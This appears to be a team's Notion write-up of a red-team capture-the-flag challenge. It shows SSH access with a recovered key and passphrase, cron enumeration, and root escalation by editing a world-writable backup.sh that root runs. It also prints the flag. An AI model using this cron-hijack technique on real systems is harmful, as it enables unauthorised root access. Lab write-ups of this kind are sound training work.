💾
DuckDuckNo
/
...
/
🏁
Challenges
/
2 CNC Elevation
Search
Duplicate
Notion
2 CNC Elevation
Tags
Redteam
Solved
DESCRIPTION
Great, now you have access to hackers command & control server.
But you probably need higher level access to find more valuable information.
QUESTION
Escalate privileges to root on command & control server at 10.12.32.130and read the flag from /root/flag.txt
SOLUTION
CNC ACCESS has id_rsa file (also in ~/Backup/home/max/id_rsa on kali 100), ssh key pass qwerty
ssh -i id_rsa max@10.12.32.130
Shell
max@command_control_SRV1:~$ ps aux USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND root 1 0.0 0.9 55064 19644 ? Ss Nov16 0:35 /usr/bin/python /usr/bin/supervisord -c /etc/supervisor.conf root 9 0.0 0.9 353760 19796 ? S Nov16 0:00 smbd --foreground --log-stdout root 14 0.0 0.1 28356 2516 ? Ss Nov16 0:01 cron syslog 18 0.0 0.1 191324 3768 ? Ssl Nov16 0:01 rsyslogd root 21 0.0 0.1 72304 4048 ? Ss Nov16 0:00 /usr/sbin/sshd root 24 0.0 0.2 342052 5912 ? S Nov16 0:00 smbd --foreground --log-stdout root 25 0.0 0.2 342076 6116 ? S Nov16 0:00 smbd --foreground --log-stdout root 11052 0.0 0.3 103856 7180 ? Ss 12:15 0:00 sshd: max [priv] max 11063 0.0 0.1 103856 3384 ? S 12:15 0:00 sshd: max@pts/0 max 11064 0.0 0.1 20256 3788 pts/0 Ss 12:15 0:00 -bash max 11078 0.0 0.1 36152 3124 pts/0 R+ 12:16 0:00 ps aux
Shell
# /etc/crontab # m h dom mon dow user command 17 * * * * root cd / && run-parts --report /etc/cron.hourly 25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily ) 47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly ) 52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly ) # * * * * * root /etc/backup.sh >/dev/null 2>&1
Shell
max@command_control_SRV1:~$ cat /etc/backup.sh #!/bin/bash # Back up the credentials for the system. Just in case zip -e --password computer /share/credz_backup.zip -u /etc/passwd /etc/shadow /home/max/id_rsa # max, change the passwords after initial testing max@command_control_SRV1:~$ ls -hal /etc/backup.sh -rwxrw-rw- 1 root root 214 Nov 10 19:34 /etc/backup.sh
Shell
World writable backup.sh, modified to cat the flag :)
max@command_control_SRV1:~$ cat /etc/backup.sh #!/bin/bash # Back up the credentials for the system. Just in case zip -e --password computer /share/credz_backup.zip -u /etc/passwd /etc/shadow /home/max/id_rsa cp /root/flag.txt /tmp/flag.txt ls -hal /root > /tmp/ls.txt # max, change the passwords after initial testing max@command_control_SRV1:~$ cd /tmp max@command_control_SRV1:/tmp$ cat flag.txt Flag: 882ff42e-83d0-4cbd-8d3f-c2df2fea5442
Shell